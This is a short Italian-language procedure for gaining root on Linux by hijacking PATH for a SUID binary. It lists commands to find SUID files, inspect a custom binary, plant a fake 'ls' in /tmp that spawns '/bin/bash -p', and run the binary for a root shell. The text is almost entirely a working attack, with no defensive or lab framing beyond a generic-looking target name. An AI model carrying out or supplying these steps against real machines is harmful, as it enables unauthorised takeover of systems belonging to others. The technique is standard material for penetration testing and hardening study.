Privilege Escalation su Linux (SUID Exploit)

Obiettivo: Sfruttare un binario SUID per ottenere root su una macchina Linux.

Procedura:

1. Trovare binari SUID vulnerabili:  find / -perm -4000 2>/dev/null

2. Analizzare env per path hijacking:  strings /usr/bin/custom-suid-binary

3. Creare un payload malevolo:

   echo "/bin/bash -p" > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

4.  Eseguire il binario SUID per ottenere root:  /usr/bin/custom-suid-binary